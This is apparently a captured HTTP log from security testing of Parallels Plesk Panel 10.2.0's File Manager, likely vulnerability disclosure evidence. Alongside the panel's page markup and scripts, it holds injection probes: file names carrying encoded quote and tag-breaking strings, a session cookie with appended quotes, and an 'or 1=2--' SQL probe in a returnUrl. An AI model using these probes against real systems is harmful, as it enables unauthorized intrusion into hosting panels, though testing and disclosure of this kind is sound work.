title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick="return bin();;lon();">3M.COM-XSS-1.JPGfdf080d921773c427dce8684</a></td><td class="number">279&nbsp;KB</td><td class="number">May 23, 2011 02:35 PM</td><td><A href="http://nosedivesailing.com/3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=3M.COM-XSS-1.JPGfdf080d921773c427dce8684" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_673db%2522a%253d%2522b%25226c91d8a7d6d" value="673db%2522a%253d%2522b%25226c91d8a7d6d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick="return bin();;lon();">673db%2522a%253d%2522b%25226c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/673db%2522a%253d%2522b%25226c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F673db%252522a%25253d%252522b%2525226c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=673db%252522a%25253d%252522b%2525226c91d8a7d6d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_6c91d8a7d6d" value="6c91d8a7d6d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=6c91d8a7d6d" onClick="return bin();;lon();">6c91d8a7d6d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/6c91d8a7d6d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=6c91d8a7d6d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F6c91d8a7d6d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=6c91d8a7d6d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="evenrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_73dd0%2522%2520a%253db%25202d0878db96d" value="73dd0%2522%2520a%253db%25202d0878db96d" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick="return bin();;lon();">73dd0%2522%2520a%253db%25202d0878db96d</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/73dd0%2522%2520a%253db%25202d0878db96d" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F73dd0%252522%252520a%25253db%2525202d0878db96d" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=73dd0%252522%252520a%25253db%2525202d0878db96d" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr><tr onMouseOver="Element.addClassName(this, &quot;current&quot;);" onMouseOut="Element.removeClassName( this, &quot;current&quot;);" onClick="var el = Event.element(event); if (&quot;TD&quot; == el.tagName) &#123; var inputElement = this.down(&quot;td.select input&quot;); if (inputElement) inputElement.click(); &#125;" class="oddrowbg"><td class="select"><input type="checkbox" class="checkbox" name="del[]" id="del_7b286%2522%253e%253ca%253ef79f4c51d2e" value="7b286%2522%253e%253ca%253ef79f4c51d2e" onClick="FileListSelectOnChange(this);"></td><td class="icon"><A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708" onMouseOver="f(event, &#039;unknown_binary&#039;);" onMouseOut="z();"><IMG src="/skins/default/plesk/icons/file_binary.gif" width="16" height="16" alt="file_binary.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=edit&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick="return bin();;lon();">7b286%2522%253e%253ca%253ef79f4c51d2e</a></td><td class="number">217&nbsp;KB</td><td class="number">May 23, 2011 03:10 PM</td><td><A href="http://nosedivesailing.com/7b286%2522%253e%253ca%253ef79f4c51d2e" onMouseOver="i(event);" onMouseOut="z();" target="_blank"><IMG src="/skins/default/plesk/icons/open_in_browser.gif" width="16" height="16" alt="open_in_browser.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/rename/?cmd=rename_file&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="e(event);" onMouseOut="z();" title="Rename file "><IMG src="/skins/default/plesk/icons/file_rename.gif" width="16" height="16" alt="file_rename.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/permissions/?fname=C%3A%2FInetpub%2Fvhosts%2Fnosedivesailing.com%2Fhttpdocs%2F7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onClick=";lon();" onMouseOver="d(event);" onMouseOut="z();" title="Change permissions for file "><IMG src="/skins/default/plesk/icons/permissions.gif" width="16" height="16" alt="permissions.gif" title=""></a></td><td><A href="/plesk/client@2/domain@1/hosting/file-manager/view/?cmd=download&amp;file=7b286%252522%25253e%25253ca%25253ef79f4c51d2e" onMouseOver="download_hint(event);" onMouseOut="z();" target=""><IMG src="/skins/default/plesk/icons/file_download.gif" width="16" height="16" alt="file_download.gif" title=""></a></td></tr></table><div class="paging pagingBottom"><table width="100%"><tr><td>1-25 <A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=chdir&amp;file=%2F" onClick=";lon();">vulnerable.host.fqdn</a> / <A href="/plesk/client@2/domain@1/hosting/file-manager/edit/?cmd=chdir&amp;file=%2Fhttpdocs%2F" onClick=";lon();">httpdocs</a> items of 44 total</td><td align="center">Pages:&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">First</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">&lt;&lt;</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">1</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">2</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">&gt;&gt;</a>&nbsp;<A href="#" onClick="FileListSetPaging(1); return false;;lon();">Last</a></td><td align="right">Number of entries per page:&nbsp;<A href="#" onClick="FileListSetPageSize(10); return false;;lon();">10</a>&nbsp;<A name="2abfff8e531baa56c2aa8da2f0cc2708" id="2abfff8e531baa56c2aa8da2f0cc2708">25</a>&nbsp;<A href="#" onClick="FileListSetPageSize(100); return false;;lon();">100</a>&nbsp;<A href="#" onClick="FileListSetPageSize(999999); return false;;lon();">All</a></td></tr></table></div><script>SetCookie("filelist", "YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9");
           function FileListSetPaging(page)
           {
               var f = document.forms[0];
               f.page.value = page;
               f.cmd.value = "setPage";
               lsubmit(f);
               return false;
           }

           function FileListSetPageSize(page_size)
           {
               var f = document.forms[0];
               f.page_size.value = page_size;
               f.cmd.value = "setPageSize";
               lsubmit(f);
               return false;
           }
       
           function FileListSelectionGet()
           {
               var f = document.forms[0];
               var selection = new Array();
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled) && f.elements[i].checked) {
                           selection.push(f.elements[i].value);
                       }
                   }
               }
               return selection;
           }
           function FileListSelect()
           {
               f = document.forms[0];
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]")) {
                       if (!(f.elements[i].value == "DISABLED" || f.elements[i].disabled)) {
                           f.elements[i].checked = f.FileListSelectAll.checked;
                           FileListSelectOnChange(f.elements[i]);
                       }
                   }
               }
               return true;
           }
       
           function FileListSelectOnChange(o)
           {
               o = $(o);
               if ("radio" == o.type) {
                   $$("input[name='" + o.name + "']").each(function(el){
                       el.up("tr").removeClassName("selected");
                   });
               }

               if (o.checked)
                   o.up("tr").addClassName("selected");
               else
                   o.up("tr").removeClassName("selected");

               return true;
           }
       
           function FileListSort(sort)
           {
               f = document.forms[0];
               f.sort.value = sort;
               f.cmd.value = "setSort";
               lsubmit(f);
               return false;
           }
       
           function FileListFilter(f)
           {
               
               if (f.filter.value.length == 0) {
                   FileListShowAll(f);
                   return false;
               }
       
               f.cmd.value = "setFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListShowAll(f)
           {
               f.cmd.value = "clearFilter";
               lsubmit(f);
               return false;
           }
       
           function FileListSearchShow()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "hide");
                   addClass(sc, "show");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "hide");
                   addClass(s, "show");
               }

               SetPermanentCookie("cListShowSearch", 1);
           }
       
           function FileListSearchHide()
           {
               var sc = document.getElementById("FileListSearchControl");
               if (sc) {
                   removeClass(sc, "show");
                   addClass(sc, "hide");
               }

               var s = document.getElementById("FileListSearch");
               if (s) {
                   removeClass(s, "show");
                   addClass(s, "hide");
               }

               SetPermanentCookie("cListShowSearch", 0);
           }
       
           function FileListRemove(f)
           {
               if (0 == FileListSelectionGet().length) {
                   alert("No objects selected.");
                   return false;
               }
               f.cmd.value = "remove";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/edit/";
               lsubmit(f);
               return false;
           }
       </script>

   </td></tr></table></fieldset>

   <div class="footnote"></div>
</div>
























<input type="hidden" name="file" value="">
<input type="hidden" name="subcmd" value="">




</form>

</div>
</div> <!-- /main -->


</div> <!-- /content-body -->

</div> <!-- /content -->
</div> <!-- /content-wrapper -->
</div> <!-- /wrapper -->
</div> <!-- page -->
<div id="footer-wrapper">
<div id="footer">
<a href="http://www.parallels.com" title="Parallels" class="small-logo" onclick="window.open(this.href); return false;"><span>Parallels</span></a>
<a href="http://www.parallels.com" onclick="window.open(this.href); return false;">&copy; Copyright 1999-2011, Parallels. All rights reserved</a>
</div>
</div>
<div id="bottomAnchor"></div>
</body>
</html>

Request 2

GET /plesk/client@2/domain@1/hosting/file-manager/edit/ HTTP/1.1
Host: vulnerable.plesk.control.panel.20110407.20:8880
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PLESKSESSID=66f4f3aa52eb21d7134fc0175f742f5a''; no_frames_root_page=deleted; locale=en-US; no_frames_logout_page=deleted; psaContext=dashboard; no_frames=deleted; filelist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; certificateslist=YTo1OntzOjU6ImZsYWdzIjtpOjA7czo0OiJzb3J0IjtzOjQ6Im5hbWUiO3M6NjoiZmlsdGVyIjtzOjA6IiI7czo0OiJwYWdlIjtpOjA7czo4OiJwYWdlU2l6ZSI7aToyNTt9; no_frames_login_page=deleted;

Response 2

HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 20:33:53 GMT
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
Set-Cookie: psaContext=dashboard; path=/
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 20:33:54 GMT
Connection: close
Content-Length: 93562

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=7" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="forgery_protection_token" id="forgery_protection_token" content="dc1721730e046f7e1de14c19e4a424be" />

<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
<link rel="icon" href="/favicon.ico" type="image/ico" />


<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/general.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/layout.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/custom.css?2">
<link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/main/desktop.css?2">
<!--[if IE]><link rel="stylesheet" type="text/css" href="/skins/default/plesk/css/ie.css?2"><![endif]-->







<link href="/skins/default/css/common/base.css?1297698230" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/common/btns.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/main.css?1297272602" media="screen" rel="stylesheet" type="text/css" />
<link href="/skins/default/css/customer/custom.css?1274451258" media="screen" rel="stylesheet" type="text/css" />
<!--[if lte IE 7]> <link href="/skins/default/css/common/ie.css?1296843248" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<!--[if IE 8]> <link href="/skins/default/css/common/ie8.css?1269638970" media="screen" rel="stylesheet" type="text/css" /><![endif]-->
<link href="/skins/default/css/customer/plesk.css?1269638970" media="screen" rel="stylesheet" type="text/css" />
<script type="text/javascript" src="/smb/externals/prototype.js?1302230704"></script>
<script type="text/javascript" src="/javascript/jsw.js?1302230642"></script>
<script type="text/javascript" src="/smb/scripts/smb.js?1302230704"></script>
<script type="text/javascript" src="/javascript/tooltip.js?1302230642"></script>
<script type="text/javascript" src="/javascript/widget.js?1302230642"></script>
<script type="text/javascript" src="/javascript/chk.js.php?1302230642"></script>
<script type="text/javascript" src="/javascript/common.js?1302230642"></script>
<script type="text/javascript" src="/admin/scripts/admin-panel.js?"></script>
<title>Parallels Plesk Panel 10.2.0 for Microsoft Windows</title>
<script type="text/javascript">
Jsw.baseUrl = '/smb';
Jsw.skinUrl = '/skins/default';
Jsw.showErrorDetails = false;
</script>

<script type="text/javascript">
// hide navigation if panel shown inside frame
if (top != self) {
var head = document.getElementsByTagName('head')[0];

var stylesheet = document.createElement('link');
stylesheet.type = 'text/css';
stylesheet.rel = 'stylesheet';
stylesheet.href = '/skins/default/css/customer/content-only.css?1286484958';
stylesheet.media = 'screen';

head.appendChild(stylesheet);
}
</script>
</head>
<body class="">
<div class="tooltip" style="display: none;"><b><i><i><i><span></span></i></i></i></b></div>

<div id="page">

<div id="wrapper">
<div id="top-wrapper" class="l-top">
<div id="top">
<div id="header-wrapper">
<div id="header">
<h1 class="logo">
<img src="/skins/default/plesk/images/def_plesk_logo.gif?1274455768" alt="Parallels Plesk Panel 10.2.0 for Microsoft Windows" />
</h1>
<div class="shortcuts">
<ul>
<li class="top-user-info">
<table cellspacing="0">
<tr>
<th>Logged in as</th>
<td>
<b>
<a href="/smb/my-profile">
Hoyt LLC Research </a>
</b>
</td>
</tr>
<tr>
<th>Subscription</th>
<td><div id="subscription-switch"></div></td>
</tr>
</table>
</li>
<li class="top-logout">
<a href="/smb/auth/logout" id="shortcutLogout"><i><span>
Log out </span></i></a>
</li>
<li class="top-help">
<a href="/smb/help/redirect/controller-name/redirect/action-name/pleskin" target="help"><i><span>
Help </span></i></a>
</li>
</ul>
</div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.SubscriptionDropdown({
applyTo: 'subscription-switch',
items: [{"value":"\/account\/switch\/id\/1","title":"vulnerable.host.fqdn"}],
title: 'vulnerable.host.fqdn',
onChange: function(dropdown, item) {
window.location.href = Jsw.baseUrl + item.value
+ '?returnUrl=' + '%2Fredirect%2Fpleskin%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fftp-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fweb-users%252F%2Froot%2F%252Fplesk%252Fclient%25402%252Fdomain%25401%252Fhosting%252Fanonymous-ftp%252F%2F%3F120933327%2520or%25201%253d2--%2520%3D1' + '&activeModule=' + '' }
});
});
//]]>
</script> </div>
</div>
</div>
<div id="navbar"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Smb.NavigationTabs({
id: 'navbar',
applyTo: 'navbar',
items: [{"componentType":"Jsw.bar.Button","title":"Home","href":"\/admin-home","containerCls":"","addCls":"nav-home"},{"componentType":"Jsw.bar.Button","title":"Users","href":"\/user\/list","containerCls":"","addCls":"nav-users"},{"componentType":"Jsw.bar.Button","title":"Mail","href":"\/email-address","containerCls":"","addCls":"nav-mail"},{"componentType":"Jsw.bar.Button","title":"Websites &amp; Domains","href":"\/web\/view","containerCls":"","addCls":"nav-sites"},{"componentType":"Jsw.bar.Button","title":"Applications","href":"\/app","containerCls":"","addCls":"nav-apps"},{"componentType":"Jsw.bar.Button","title":"Statistics","href":"\/statistics","containerCls":"","addCls":"nav-statistics"},{"componentType":"Jsw.bar.Button","title":"Account","href":"\/account","containerCls":"","addCls":"nav-account"}] });
});
//]]>
</script>
</div>
<div id="content-wrapper">
<div id="content">

<div id="pathbar-wrapper"></div>

<script type="text/javascript">
//<![CDATA[
Jsw.onReady(function() {
new Jsw.Pathbar({
id: 'pathbar',
cls: 'pathbar clearfix',
renderTo: 'pathbar-wrapper',
items: [] });
});
//]]>
</script>

<div class="heading ">
<div class="heading-area">
<div class="toolbar">
<span id="toolbar-content"></span>
<a class="s-btn sb-uplevel" href="/smb#">
<span>Up Level</span>
</a>
</div>
<h2><span>File Manager</span></h2>
</div>
</div>


<div id="content-body" class="clearfix">
<div id="main">

<script type="text/javascript">
var opt_no_frames = true;
Jsw.baseUrl = '/smb';

SetHelpModule = function(module)
{
PleskHelpModule = module;
}
var PleskHelpModule = null;

Jsw.onReady(function() {

$$('.top-help').each(function(topHelp) {
topHelp.select('a').each(function(help) {
help.href = help.href + '/plesk-context/filemanager/';
if (PleskHelpModule) {
help.href = help.href + '/plesk-module/' + PleskHelpModule + '/';
}
});
});

$$('.sb-uplevel').each(function(link) {
link.href = '/plesk/client@2/domain@1/hosting/file-manager/';
});

if ('') {
$('content').down('.heading').addClassName('');
}
});

var opt_integrated_mode = false;


           function update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "update";
               lsubmit(f);

               return false;
           }

           function chmod_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "chmod";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function rename_update_oC()
           {
               f = document.forms[0];
               f.cmd.value = "rename";
               f.subcmd.value = "update";
               lsubmit(f);

               return false;
           }

           function new_file_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_file";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-file/"
               lsubmit(f);

               return false;
           }

           function count_size_oC()
           {
               f = document.forms[0];
               f.cmd.value = "count_size";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function extract_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "extract";
               f.subcmd.value = "";
               lsubmit(f);
               return false;
           }

           function pack_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/pack/"
               lsubmit(f);

               return false;
           }

           function create_archive_oC() {
               f = document.forms[0];

               if ("" == f.archive_name.value) {
                   alert("Please enter file name.");
                   return false;
               }

               f.cmd.value = "pack";
               f.subcmd.value = "pack";
               lsubmit(f);

               return false;
           }

           function new_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "new_dir";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/create-dir/"
               lsubmit(f);

               return false;
           }

           function create_file_oC()
           {
               f = document.forms[0];
errorfield(f.new_file, false);

               if (f.create_file_method[0].checked) { // upload
                   f.cmd.value = "upload_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               if (f.create_file_method[1].checked) { // create
                   if (f.new_file.value == "") {
        errorfield(f.new_file, true);
                       alert("Some fields are empty or contain an improper value.");
                       f.new_file.focus();
                       return false;
                   }

                   f.cmd.value = "create_file";
                   f.file.value = f.new_file.value;
                   f.subcmd.value = "";
                   lsubmit(f);

                   return false;
               }

               return false;
           }

           function create_file_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_file";
               f.subcmd.value = "save";
               lsubmit(f);

               return false;
           }

           function create_dir_oC()
           {
               f = document.forms[0];
               f.cmd.value = "create_dir";
               f.file.value = f.new_dir.value;
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function edit_reset_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "";
               f.reset();
               return false;
           }

           function edit_save_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save";
               lsubmit(f);
               return false;
           }

           function edit_save_exit_oC()
           {
               f = document.forms[0];
               f.cmd.value = "edit";
               f.subcmd.value = "save_exit";
               lsubmit(f);
               return false;
           }

           function codepage_oC()
           {
               f = document.forms[0];
               f.subcmd.value = "codepage";
               lsubmit(f);
               return false;
           }

           function cancel_oC()
           {
               f = document.forms[0];
               f.cmd.value = "";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/"
               lsubmit(f);
               return false;
           }

           function touch_oC()
           {
               f = document.forms[0];

               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               if (!confirm("Are you sure you want to change the timestamp of the selected files?"))
                   return false;

               f.cmd.value="touch";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function copy_move_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="copy_move";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/copy-move/"
               lsubmit(f);

               return false;
           }

           function copy_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "copy";
               lsubmit(f);

               return false;
           }

           function move_file_oC() {
               f = document.forms[0];
               f.file.value = f.destination.value;
               f.cmd.value = "copy_move";
               f.subcmd.value = "move";
               lsubmit(f);

               return false;
           }

           function remove_oC()
           {
               f = document.forms[0];
               if (0 == check_selection(f)) {
                   alert("No file(s) selected.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               f.action = "/plesk/client@2/domain@1/hosting/file-manager/remove/"
               lsubmit(f);

               return false;
           }

           function remove_submit_oC()
           {
               f = document.forms[0];
               if (!f.confirm.checked) {
                   alert("You must confirm deletion.");
                   return false;
               }

               f.cmd.value="remove";
               f.subcmd.value = "";
               lsubmit(f);

               return false;
           }

           function check_selection()
           {
               f = document.forms[0];
               selected = 0;
               for (i = 0 ; i < f.elements.length; i++) {
                   if ((f.elements[i].type == "checkbox") && (f.elements[i].name == "del[]") && f.elements[i].checked) {
                       selected++;
                   }
               }
               return selected;
           }

           function perm_click(t, id) {
               el = document.forms[0].elements;
               switch (t) {
               case "ra":
                   if (el["ra_perm[" + id + "]"].checked) {
                       el["rd_perm[" + id + "]"].checked = false;
                       el["fd_perm[" + id + "]"].checked = false;
                       if (el["wa_perm[" + id + "]"].checked && el["xa_perm[" + id + "]"].checked)
                           el["fa_perm[" + id + "]"].checked = true;
                   } else
                       el["fa_perm[" + id + "]"].checked = false;
                   break;
               case "rd":
                   if (el["rd_perm[" + id + "]"].checked) {
                       el["ra_perm[" + id + "]"].checked = false;
